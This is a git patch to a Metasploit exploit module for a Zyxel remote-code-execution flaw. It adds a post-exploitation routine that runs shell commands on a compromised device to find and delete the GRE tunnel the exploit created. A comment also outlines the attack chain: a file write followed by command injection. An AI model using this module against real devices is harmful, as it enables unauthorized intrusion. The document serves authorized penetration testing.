From d8d1ea7ffb8c1a210bffc1925bc700459823aeb4 Mon Sep 17 00:00:00 2001 From: Jack Heysel Date: Wed, 29 May 2024 16:04:00 -0400 Subject: [PATCH] Added on_new_session method --- .../linux/http/zyxel_parse_config_rce.rb | 21 +++++++++++++++++++ 1 file changed, 21 insertions(+) diff --git a/modules/exploits/linux/http/zyxel_parse_config_rce.rb b/modules/exploits/linux/http/zyxel_parse_config_rce.rb index ee53c22662..e1b6271aaf 100644 --- a/modules/exploits/linux/http/zyxel_parse_config_rce.rb +++ b/modules/exploits/linux/http/zyxel_parse_config_rce.rb @@ -80,6 +80,27 @@ class MetasploitModule < Msf::Exploit::Remote CheckCode::Unknown('Version and product info were unable to be determined.') end + def on_new_session(session) + super + command_output = '' + # Get the most recently created GRE tunnel interface, bring it down then delete it to allow for subsequent module runs. + if session.type.to_s.eql? 'meterpreter' + newest_gre = session.sys.process.execute '/bin/sh', "-c \"ip -d link show type gre | grep -oP '^\\d+: \\K[^@]+' | tail -n 1\"" + print_good("Found the most recently created GRE tunnel interface: #{newest_gre}. Going to delete it to allow for subsequent module runs.") + command_output = session.sys.process.execute '/bin/sh', "-c \"ifconfig #{newest_gre} down && ip tunnel del #{newest_gre} mode gre && echo success\"" + elsif session.type.to_s.eql? 'shell' + newest_gre = session.shell_command_token "ip -d link show type gre | grep -oP '^\\d+: \\K[^@]+' | tail -n 1" + print_good("Found the most recently created GRE tunnel interface: #{newest_gre}. Going to delete it to allow for subsequent module runs.") + command_output = session.shell_command_token "ifconfig #{newest_gre} down && ip tunnel del #{newest_gre} mode gre && echo success" + end + + if command_output.includes?('success') + print_good('The GRE interface was successfully removed.') + else + print_warning('The module failed to remove the GRE interface created by this exploit. Subsequent module runs will likely fail unless unless it\'s successfully removed') + end + end + def exploit # Command injection has a 0x14 byte length limit so keep the file name as small as possible. # The length limit is also why we leverage the arbitrary file write -> write our payload to the .qrs file then execute it with the command injection.